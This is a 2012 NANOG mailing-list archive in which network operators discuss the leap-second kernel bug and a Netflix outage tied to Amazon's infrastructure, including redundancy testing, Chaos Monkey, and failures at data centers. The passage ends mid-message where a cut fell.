baylink.com (Jay Ashworth) Date: Mon, 2 Jul 2012 12:04:04 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C38D.9050009@gmail.com> Message-ID: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Alex Harrowell" > On 02/07/12 16:47, AP NANOG wrote: > > Do you happen to know all the kernels and versions affected by this? > > 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122 Well, my 2.6.32 CentOS6/64 machine, which is not running Java, just purred right along, logging the leapsecond at 7pm, and not even blinking, so... (Amazon EC2, NTP enabled; 3 strat-2s from us.pool) Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From bicknell at ufp.org Mon Jul 2 11:09:09 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Mon, 2 Jul 2012 09:09:09 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <20120702160909.GA65216@ussenterprise.ufp.org> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote: > from the perspective of people watching B-rate movies: this was a > failure to implement and test a reliable system for streaming those > movies in the face of a power outage at one facility. I want to emphasize _and test_. Work on an infrastructure which is redundant and designed to provide "100% uptime" (which is impossible, but that's another story) means that there should be confidence in a failure being automatically worked around, detected, and reported. I used to work with a guy who had a simple test for these things, and if I was a VP at Amazon, Netflix, or any other large company I would do the same. About once a month he would walk out on the floor of the data center and break something. Pull out an ethernet. Unplug a server. Flip a breaker. Then he would wait, to see how long before a technician came to fix it. If these activities were service impacting to customers the engineering or implementation was faulty, and remediation was performed. Assuming they acted as designed and the customers saw no faults the team was graded on how quickly the detected and corrected the outage. I've seen too many companies who's "test" is planned months in advance, and who exclude the parts they think aren't up to scratch from the test. Then an event occurs, and they fail, and take down customers. TL;DR If you're not confident your operation could withstand someone walking into your data center and randomly doing something, you are NOT redundant. -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From mike at mtcc.com Mon Jul 2 11:13:42 2012 From: mike at mtcc.com (Michael Thomas) Date: Mon, 02 Jul 2012 09:13:42 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> Message-ID: <4FF1C8B6.6010503@mtcc.com> On 07/02/2012 09:04 AM, Jay Ashworth wrote: > ----- Original Message ----- >> From: "Alex Harrowell" >> On 02/07/12 16:47, AP NANOG wrote: >>> Do you happen to know all the kernels and versions affected by this? >> 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122 > Well, my 2.6.32 CentOS6/64 machine, which is not running Java, just purred > right along, logging the leapsecond at 7pm, and not even blinking, so... > (Amazon EC2, NTP enabled; 3 strat-2s from us.pool) > My centos 6/64 running 3.0 seemed to weather it too. I'm not quite clear on what I should be looking for to classify it as being "broken" though. Mike From drais at icantclick.org Mon Jul 2 11:13:22 2012 From: drais at icantclick.org (david raistrick) Date: Mon, 2 Jul 2012 12:13:22 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> Message-ID: On Mon, 2 Jul 2012, Leo Bicknell wrote: > I used to work with a guy who had a simple test for these things, > and if I was a VP at Amazon, Netflix, or any other large company I > would do the same. About once a month he would walk out on the you mean like this? http://techblog.netflix.com/2011/07/netflix-simian-army.html -- david raistrick http://www.netmeister.org/news/learn2quote.html drais at icantclick.org From bicknell at ufp.org Mon Jul 2 11:17:46 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Mon, 2 Jul 2012 09:17:46 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> Message-ID: <20120702161746.GA65753@ussenterprise.ufp.org> In a message written on Mon, Jul 02, 2012 at 12:13:22PM -0400, david raistrick wrote: > you mean like this? > > http://techblog.netflix.com/2011/07/netflix-simian-army.html Yes, Netflix seems to get it, and I think their Simian Army is a great Q&A tool. However, it is not a complete testing system, I have never seen them talk about testing non-software components, and I hope they do that as well. As we saw in the previous Amazon outage, part of the problem was a circuit breaker configuration. -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From drais at icantclick.org Mon Jul 2 11:23:57 2012 From: drais at icantclick.org (david raistrick) Date: Mon, 2 Jul 2012 12:23:57 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: <20120702161746.GA65753@ussenterprise.ufp.org> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> Message-ID: On Mon, 2 Jul 2012, Leo Bicknell wrote: >> http://techblog.netflix.com/2011/07/netflix-simian-army.html > > Yes, Netflix seems to get it, and I think their Simian Army is a > great Q&A tool. However, it is not a complete testing system, I > have never seen them talk about testing non-software components, > and I hope they do that as well. As we saw in the previous Amazon > outage, part of the problem was a circuit breaker configuration. When the hardware is outsourced how would you propose testing the non-software components? They do simulate availability zone issues (and AZ is as close as you get to controlling which internal power/network/etc grid you're attached to). I suppose they could introduce artificial network latency/loss @ each instance - and could add testing around what happens when amazon's API disappears (as was the case friday). Beyond that....the rest of it is up to the hardware provider (Amazon, in this case). ..david (who also relies on outsourced hardware these days) -- david raistrick http://www.netmeister.org/news/learn2quote.html drais at icantclick.org From nanog at armoredpackets.com Mon Jul 2 11:31:26 2012 From: nanog at armoredpackets.com (AP NANOG) Date: Mon, 02 Jul 2012 12:31:26 -0400 Subject: FYI Netflix is down In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> Message-ID: <4FF1CCDE.4040103@armoredpackets.com> This is an excellent example of how tests "should" be ran, unfortunately far too many places don't do this... -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel On 7/2/12 12:09 PM, Leo Bicknell wrote: > In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote: >> from the perspective of people watching B-rate movies: this was a >> failure to implement and test a reliable system for streaming those >> movies in the face of a power outage at one facility. > I want to emphasize _and test_. > > Work on an infrastructure which is redundant and designed to provide > "100% uptime" (which is impossible, but that's another story) means > that there should be confidence in a failure being automatically > worked around, detected, and reported. > > I used to work with a guy who had a simple test for these things, > and if I was a VP at Amazon, Netflix, or any other large company I > would do the same. About once a month he would walk out on the > floor of the data center and break something. Pull out an ethernet. > Unplug a server. Flip a breaker. > > Then he would wait, to see how long before a technician came to fix > it. > > If these activities were service impacting to customers the engineering > or implementation was faulty, and remediation was performed. Assuming > they acted as designed and the customers saw no faults the team was > graded on how quickly the detected and corrected the outage. > > I've seen too many companies who's "test" is planned months in advance, > and who exclude the parts they think aren't up to scratch from the test. > Then an event occurs, and they fail, and take down customers. > > TL;DR If you're not confident your operation could withstand someone > walking into your data center and randomly doing something, you are > NOT redundant. > From shortdudey123 at gmail.com Mon Jul 2 11:42:27 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Mon, 2 Jul 2012 11:42:27 -0500 Subject: FYI Netflix is down In-Reply-To: <4FF1CCDE.4040103@armoredpackets.com> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <4FF1CCDE.4040103@armoredpackets.com> Message-ID: The problem is large scale tests take a lot of time and planning. For it to be done right, you really need a dedicated DR team. -Grant On Mon, Jul 2, 2012 at 11:31 AM, AP NANOG wrote: > This is an excellent example of how tests "should" be ran, unfortunately > far too many places don't do this... > > > -- > > Thank you, > > Robert Miller > http://www.armoredpackets.com > > Twitter: @arch3angel > > On 7/2/12 12:09 PM, Leo Bicknell wrote: > >> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd >> Underwood wrote: >> >>> from the perspective of people watching B-rate movies: this was a >>> failure to implement and test a reliable system for streaming those >>> movies in the face of a power outage at one facility. >>> >> I want to emphasize _and test_. >> >> Work on an infrastructure which is redundant and designed to provide >> "100% uptime" (which is impossible, but that's another story) means >> that there should be confidence in a failure being automatically >> worked around, detected, and reported. >> >> I used to work with a guy who had a simple test for these things, >> and if I was a VP at Amazon, Netflix, or any other large company I >> would do the same. About once a month he would walk out on the >> floor of the data center and break something. Pull out an ethernet. >> Unplug a server. Flip a breaker. >> >> Then he would wait, to see how long before a technician came to fix >> it. >> >> If these activities were service impacting to customers the engineering >> or implementation was faulty, and remediation was performed. Assuming >> they acted as designed and the customers saw no faults the team was >> graded on how quickly the detected and corrected the outage. >> >> I've seen too many companies who's "test" is planned months in advance, >> and who exclude the parts they think aren't up to scratch from the test. >> Then an event occurs, and they fail, and take down customers. >> >> TL;DR If you're not confident your operation could withstand someone >> walking into your data center and randomly doing something, you are >> NOT redundant. >> >> > From joly at punkcast.com Mon Jul 2 11:53:03 2012 From: joly at punkcast.com (Joly MacFie) Date: Mon, 2 Jul 2012 12:53:03 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C8B6.6010503@mtcc.com> References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com> Message-ID: Made the press.. http://www.washingtonpost.com/business/technology/leap-second-bug-takes-down-reddit-and-a-bunch-of-other-sites/2012/07/02/gJQAlXg1HW_story.html -- --------------------------------------------------------------- Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com http://pinstand.com - http://punkcast.com VP (Admin) - ISOC-NY - http://isoc-ny.org -------------------------------------------------------------- - From bicknell at ufp.org Mon Jul 2 12:53:00 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Mon, 2 Jul 2012 10:53:00 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> Message-ID: <20120702175300.GA69672@ussenterprise.ufp.org> In a message written on Mon, Jul 02, 2012 at 12:23:57PM -0400, david raistrick wrote: > When the hardware is outsourced how would you propose testing the > non-software components? They do simulate availability zone issues (and > AZ is as close as you get to controlling which internal power/network/etc > grid you're attached to). Find a provider with a similar methodology. Perhaps Netflix never conducts a power test, but their colo vendor would perform such testing. If no colo providers exist that share their values on testing, that may be a sign that outsourcing it isn't the right answer... -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From cb.list6 at gmail.com Mon Jul 2 13:20:45 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Mon, 2 Jul 2012 11:20:45 -0700 Subject: FYI Netflix is down In-Reply-To: <20120702175300.GA69672@ussenterprise.ufp.org> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> Message-ID: On Jul 2, 2012 10:53 AM, "Leo Bicknell" wrote: > > In a message written on Mon, Jul 02, 2012 at 12:23:57PM -0400, david raistrick wrote: > > When the hardware is outsourced how would you propose testing the > > non-software components? They do simulate availability zone issues (and > > AZ is as close as you get to controlling which internal power/network/etc > > grid you're attached to). > > Find a provider with a similar methodology. Perhaps Netflix never > conducts a power test, but their colo vendor would perform such > testing. > > If no colo providers exist that share their values on testing, that > may be a sign that outsourcing it isn't the right answer... > > -- > Leo Bicknell - bicknell at ufp.org - CCIE 3440 > PGP keys at http://www.ufp.org/~bicknell/ I suggest using RAIC Redundant array of inexpensive clouds. Make your chaos animal go after sites and regions instead of individual VMs. CB From egon at egon.cc Mon Jul 2 13:30:11 2012 From: egon at egon.cc (James Downs) Date: Mon, 2 Jul 2012 11:30:11 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> Message-ID: <78E0D635-D7CD-4BAC-98EB-6256234C45F2@egon.cc> On Jul 2, 2012, at 9:23 AM, david raistrick wrote: > When the hardware is outsourced how would you propose testing the non-software components? They do simulate availability zone issues (and AZ is as close as you get to controlling which internal power/network/etc grid you're attached to). We all know what netflix *says* they do, but they *did* have an outage. -j From tony.mccrory at gmail.com Mon Jul 2 13:53:32 2012 From: tony.mccrory at gmail.com (Tony McCrory) Date: Mon, 2 Jul 2012 19:53:32 +0100 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> Message-ID: On 2 July 2012 19:20, Cameron Byrne wrote: > > Make your chaos animal go after sites and regions instead of individual > VMs. > > CB > >From a previous post mortem http://techblog.netflix.com/2011_04_01_archive.html " Create More Failures Currently, Netflix uses a service called "Chaos Monkey" to simulate service failure. Basically, Chaos Monkey is a service that kills other services. We run this service because we want engineering teams to be used to a constant level of failure in the cloud. Services should automatically recover without any manual intervention. We don't however, simulate what happens when an entire AZ goes down and therefore we haven't engineered our systems to automatically deal with those sorts of failures. Internally we are having discussions about doing that and people are already starting to call this service "Chaos Gorilla". *"* It would seem the Gorilla hasn't quite matured. Tony From paul at paulgraydon.co.uk Mon Jul 2 13:59:57 2012 From: paul at paulgraydon.co.uk (Paul Graydon) Date: Mon, 02 Jul 2012 08:59:57 -1000 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> Message-ID: <4FF1EFAD.6000204@paulgraydon.co.uk> On 07/02/2012 08:53 AM, Tony McCrory wrote: > On 2 July 2012 19:20, Cameron Byrne wrote: > >> Make your chaos animal go after sites and regions instead of individual >> VMs. >> >> CB >> > From a previous post mortem > http://techblog.netflix.com/2011_04_01_archive.html > > " > Create More Failures > Currently, Netflix uses a service called "Chaos > Monkey" > to simulate service failure. Basically, Chaos Monkey is a service that > kills other services. We run this service because we want engineering teams > to be used to a constant level of failure in the cloud. Services should > automatically recover without any manual intervention. We don't however, > simulate what happens when an entire AZ goes down and therefore we haven't > engineered our systems to automatically deal with those sorts of failures. > Internally we are having discussions about doing that and people are > already starting to call this service "Chaos Gorilla". > *"* > > It would seem the Gorilla hasn't quite matured. > > Tony From conversations with Adrian Cockcroft this weekend it wasn't the result of Chaos Gorilla or Chaos Monkey failing to prepare them adequately. All their automated stuff worked perfectly, the infrastructure tried to self heal. The problem was that yet again Amazon's back-plane / control-plane was unable to cope with the requests. Netflix uses Amazon's ELB to balance the traffic and no back-plane meant they were unable to reconfigure it to route around the problem. Paul From egon at egon.cc Mon Jul 2 14:08:18 2012 From: egon at egon.cc (James Downs) Date: Mon, 2 Jul 2012 12:08:18 -0700 Subject: FYI Netflix is down In-Reply-To: <4FF1EFAD.6000204@paulgraydon.co.uk> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: On Jul 2, 2012, at 11:59 AM, Paul Graydon wrote: > back-plane / control-plane was unable to cope with the requests. Netflix uses Amazon's ELB to balance the traffic and no back-plane meant they were unable to reconfigure it to route around the problem. Someone needs to define back-plane/control-plane in this case. (and what wasn't working) During the height of the problems, what I saw was a Netflix A record pointing at a broken ELB. If there was an ELB to point to in another AZ, it wouldn't take anything from Amazon to change that A record, as Netflix uses ultradns. -j From george.herbert at gmail.com Mon Jul 2 14:08:28 2012 From: george.herbert at gmail.com (George Herbert) Date: Mon, 2 Jul 2012 12:08:28 -0700 Subject: FYI Netflix is down In-Reply-To: <4FEEAB1B.7030806@deaddrop.org> References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: Late reply, but: On Sat, Jun 30, 2012 at 12:30 AM, Lynda wrote: >... > Second, and more important. I *was* a "computer science guy" in a past life, > and this is nonsense. You can have astonishingly large software projects > that just continue to run smoothly, day in, day out, and they don't hit the > news, because they don't break. There are data centers that don't hit the > news, in precisely the same way. I really need to write the book on IT reliability I keep meaning to. There's reliability - backwards looking statistical, which can be 100% for a given service or datacenter - and then there's dependability, forwards-predicted outage risks, which people often *assert* equals the prior reliability record, but in reality you often have a number of latent failures (and latent cascade paths) that you do not understand, did not identify previously, and are not aware of. I've had or had to respond to over a billion dollars of culminative IT disaster loss over my consulting career so far; I have NEVER seen anyone who did it perfect, even the best pros. And I include myself in that list. Looking at other fields like aerospace and nuclear engineering, what is done in IT is not anywhere close to the same level of QA and engineering analysis and testing. We cannot assert better results with less work. "Oh, that never happens", except I've had my stuff in three locations that had catastrophic generator failures. "Oh, that never happens" when you're doing power maintenance and the best-rated electrical company in California, in conjunction with the generator vendor and a couple of independent power EEs, mis-balance the maintenance generator loads between legs and blow the generators and datacenter. "Oh, that never happens" that the datacenter burns (or starts to burn and then gets flooded). "Oh, that never happens" that the FM-200 goes off or preaction breaks and water leaks. "Oh, that never happens" that well maintained and monitored and triple-redundant AC units all trip offline due to a common mode failure over the course of a weekend and the room gets up to 106 degrees. Oh thank god the next thing didn't go wrong in THAT situation, because the spot temperature meters indicated that the ceiling height of that particular room peaked at 1 degree short of the temp at which the sprinkler heads are supposed to discharge, so we nearly lost that room to flooding rather than just a 10% disk and 15% power supply attrition over the next year... Don't be so confident in the infrastructure. It's not engineered or built or maintained well enough to actually support that assertion. The same can be said of the application software and application architecture and integration. -- -george william herbert george.herbert at gmail.com From dgolding at ragingwire.com Mon Jul 2 14:25:54 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Mon, 2 Jul 2012 12:25:54 -0700 Subject: FYI Netflix is down In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5C3E@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > From: Leo Bicknell [mailto:bicknell at ufp.org] > > > I want to emphasize _and test_. [snip] > > I used to work with a guy who had a simple test for these things, and > if I was a VP at Amazon, Netflix, or any other large company I would do > the same. About once a month he would walk out on the floor of the > data center and break something. Pull out an ethernet. > Unplug a server. Flip a breaker. > *DING DING* - we have a winner! In a previous life, I used to spend a lot of time in other people's data centers. The key question to ask was how often they pulled the plug - i.e. disconnected utility power without having backup generators running. Simulating an actual failure. That goes for pulling out an Ethernet cord or unplugging a server, or flipping a breaker. Its all the same. The problem is that if you don't do this for a while, you get SCARED of doing it, and you stop doing it. The longer you go without, the scarier it gets, to the point where you will never do it, because you have no idea what will happen, other that you probably getting fired. This is called "horrible engineering management", and is very common. The other problem, of course, is that people design under the assumption that everything will always work, and that failure modes, when they occur, are predictable and fall into a narrow set. Multiple failure modes? Not tested. Failure modes including operator error? Never tested. When was the last time you had a drill? - Dan > Then he would wait, to see how long before a technician came to fix it. > > If these activities were service impacting to customers the engineering > or implementation was faulty, and remediation was performed. Assuming > they acted as designed and the customers saw no faults the team was > graded on how quickly the detected and corrected the outage. > > I've seen too many companies who's "test" is planned months in advance, > and who exclude the parts they think aren't up to scratch from the > test. > Then an event occurs, and they fail, and take down customers. > > TL;DR If you're not confident your operation could withstand someone > walking into your data center and randomly doing something, you are NOT > redundant. > > -- > Leo Bicknell - bicknell at ufp.org - CCIE 3440 > PGP keys at http://www.ufp.org/~bicknell/ From nanog at armoredpackets.com Mon Jul 2 14:32:52 2012 From: nanog at armoredpackets.com (AP NANOG) Date: Mon, 02 Jul 2012 15:32:52 -0400 Subject: FYI Netflix is down In-Reply-To: <4FF1EFAD.6000204@paulgraydon.co.uk> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: <4FF1F764.2060701@armoredpackets.com> I believe in my dictionary Chaos Gorilla translates into "Time To Go Home", with a rough definition of "Everything just crapped out - The world is ending"; but then again I may have hat incorrect :-) -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel On 7/2/12 2:59 PM, Paul Graydon wrote: > On 07/02/2012 08:53 AM, Tony McCrory wrote: >> On 2 July 2012 19:20, Cameron Byrne wrote: >> >>> Make your chaos animal go after sites and regions instead of individual >>> VMs. >>> >>> CB >>> >> From a previous post mortem >> http://techblog.netflix.com/2011_04_01_archive.html >> >> " >> Create More Failures >> Currently, Netflix uses a service called "Chaos >> Monkey" >> >> to simulate service failure. Basically, Chaos Monkey is a service that >> kills other services. We run this service because we want engineering >> teams >> to be used to a constant level of failure in the cloud. Services should >> automatically recover without any manual intervention. We don't however, >> simulate what happens when an entire AZ goes down and therefore we >> haven't >> engineered our systems to automatically deal with those sorts of >> failures. >> Internally we are having discussions about doing that and people are >> already starting to call this service "Chaos Gorilla". >> *"* >> >> It would seem the Gorilla hasn't quite matured. >> >> Tony > From conversations with Adrian Cockcroft this weekend it wasn't the > result of Chaos Gorilla or Chaos Monkey failing to prepare them > adequately. All their automated stuff worked perfectly, the > infrastructure tried to self heal. The problem was that yet again > Amazon's back-plane / control-plane was unable to cope with the > requests. Netflix uses Amazon's ELB to balance the traffic and no > back-plane meant they were unable to reconfigure it to route around > the problem. > > Paul > > From joly at punkcast.com Mon Jul 2 14:36:21 2012 From: joly at punkcast.com (Joly MacFie) Date: Mon, 2 Jul 2012 15:36:21 -0400 Subject: FYI Netflix is down In-Reply-To: <4FF1F764.2060701@armoredpackets.com> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <4FF1F764.2060701@armoredpackets.com> Message-ID: Good band name. > Chaos Gorilla -- --------------------------------------------------------------- Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com http://pinstand.com - http://punkcast.com VP (Admin) - ISOC-NY - http://isoc-ny.org -------------------------------------------------------------- - From mooregr at greenms.com Mon Jul 2 14:43:29 2012 From: mooregr at greenms.com (Greg D. Moore) Date: Mon, 02 Jul 2012 15:43:29 -0400 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: At 03:08 PM 7/2/2012, George Herbert wrote: If folks have not read it, I would suggest reading Normal Accidents by Charles Perrow. The "it can't happen" is almost guaranteed to happen. ;-) And when it does, it'll often interact in ways we can't predict or sometimes even understand. As for pulling the plug to test stuff. I recall a demo at Netapps in the early 00's. They were talking about their fault tolerance and how great it was. So I walked up to their demo array and said, "So, it shouldn't be a problem if I pulled this drive right here?" Before I could the salesperson or tech guy, can't remember, told me to stop. He didn't want to risk it. That right there said loads about their confidence in their own system. >Late reply, but: > >On Sat, Jun 30, 2012 at 12:30 AM, Lynda wrote: > >... > > Second, and more important. I *was* a "computer science guy" in a > past life, > > and this is nonsense. You can have astonishingly large software projects > > that just continue to run smoothly, day in, day out, and they don't hit the > > news, because they don't break. There are data centers that don't hit the > > news, in precisely the same way. > >I really need to write the book on IT reliability I keep meaning to. > >There's reliability - backwards looking statistical, which can be 100% >for a given service or datacenter - and then there's dependability, >forwards-predicted outage risks, which people often *assert* equals >the prior reliability record, but in reality you often have a number >of latent failures (and latent cascade paths) that you do not >understand, did not identify previously, and are not aware of. > >I've had or had to respond to over a billion dollars of culminative IT >disaster loss over my consulting career so far; I have NEVER seen >anyone who did it perfect, even the best pros. And I include myself >in that list. > >Looking at other fields like aerospace and nuclear engineering, what >is done in IT is not anywhere close to the same level of QA and >engineering analysis and testing. We cannot assert better results >with less work. > >"Oh, that never happens", except I've had my stuff in three locations >that had catastrophic generator failures. "Oh, that never happens" >when you're doing power maintenance and the best-rated electrical >company in California, in conjunction with the generator vendor and a >couple of independent power EEs, mis-balance the maintenance generator >loads between legs and blow the generators and datacenter. "Oh, that >never happens" that the datacenter burns (or starts to burn and then >gets flooded). "Oh, that never happens" that the FM-200 goes off or >preaction breaks and water leaks. "Oh, that never happens" that well >maintained and monitored and triple-redundant AC units all trip >offline due to a common mode failure over the course of a weekend and >the room gets up to 106 degrees. Oh thank god the next thing didn't >go wrong in THAT situation, because the spot temperature meters >indicated that the ceiling height of that particular room peaked at 1 >degree short of the temp at which the sprinkler heads are supposed to >discharge, so we nearly lost that room to flooding rather than just a >10% disk and 15% power supply attrition over the next year... > >Don't be so confident in the infrastructure. It's not engineered or >built or maintained well enough to actually support that assertion. >The same can be said of the application software and application >architecture and integration. > > >-- >-george william herbert >george.herbert at gmail.com Greg D. Moore http://greenmountainsoftware.wordpress.com/ CEO QuiCR: Quick, Crowdsourced Responses. http://www.quicr.net From drais at icantclick.org Mon Jul 2 15:20:24 2012 From: drais at icantclick.org (david raistrick) Date: Mon, 2 Jul 2012 16:20:24 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: On Mon, 2 Jul 2012, James Downs wrote: >> back-plane / control-plane was unable to cope with the requests. Netflix uses Amazon's ELB to balance the traffic and no back-plane meant they were unable to reconfigure it to route around the problem. > > Someone needs to define back-plane/control-plane in this case. (and what > wasn't working) Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages. I know nothing of the netflix side of it - but that's what -we- saw. (and that caused all us-east RDS instances in every AZ to appear offline..) -- david raistrick http://www.netmeister.org/news/learn2quote.html drais at icantclick.org From rbf+nanog at panix.com Mon Jul 2 15:32:17 2012 From: rbf+nanog at panix.com (Brett Frankenberger) Date: Mon, 2 Jul 2012 15:32:17 -0500 Subject: FYI Netflix is down In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org> References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> Message-ID: <20120702203216.GA1208@panix.com> On Mon, Jul 02, 2012 at 09:09:09AM -0700, Leo Bicknell wrote: > In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote: > > from the perspective of people watching 